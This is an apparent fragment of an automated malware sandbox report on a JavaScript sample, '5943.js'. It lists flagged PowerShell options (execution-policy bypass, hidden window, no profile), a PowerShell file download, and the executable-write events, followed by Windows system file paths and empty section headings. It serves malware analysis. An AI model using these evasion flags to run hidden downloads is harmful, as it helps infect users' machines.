option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

5943.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All